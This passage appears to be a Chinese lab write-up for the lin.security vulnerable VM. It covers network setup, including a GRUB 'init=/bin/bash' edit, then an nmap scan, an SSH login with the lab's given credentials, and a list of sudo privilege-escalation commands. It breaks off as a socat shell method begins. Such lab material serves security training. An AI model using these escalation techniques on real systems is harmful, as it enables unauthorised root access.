靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。
首先,您可以使用以下凭据登录主机:bob / secret
下载地址:https://in.security/downloads/lin.security_v1.0.ova
环境配置:
1.因为直接开机的security靶机NAT连接,无法获取到ip,所以重新关机,在开机第一秒按住shift键,然后按e,进入配置界面:
将ro改为 rw signie init=/bin/bash
2.按ctrl+X或者F10重启,重启之后查看网卡为ens33:
3.这时候需要修改enp0s3为ens33,修改之后进行应用,重启即可:
Ubuntu从16.04开始,虽然
/etc/network/interfaces
里也可以修改固定IP的配置,但是多网卡采用 netplan方式,配置文件是:/etc/netplan/50-cloud-init.yaml
vim /etc/netplan/50-cloud-init.yaml
netplan apply //配置应用生效
4.如果还是不行,则修改/etc/network/interfaces中的配置:
vim /etc/network/interfaces
新增两行:
auto ens33
iface ens33 inet dhcp
一、信息收集
1.扫描端口,开放了22端口,根据给的账号进行远程登录:
nmap -sS -sV -T5 -p- 192.168.225.192
ssh [email protected]
二、sudo提权
2.由于该靶机存在许多漏洞,所以提权方法很多:
1)常规方法:sudo -l查看支持root权限的命令
输入很多命令均可提权:
sudo ash
sudo bash
sudo /bin/bash
sudo dash
sudo csh
sudo sh
sudo curl
sudo zsh
2)socat提权:
在服务端建立一个端口1234的shell
sudo so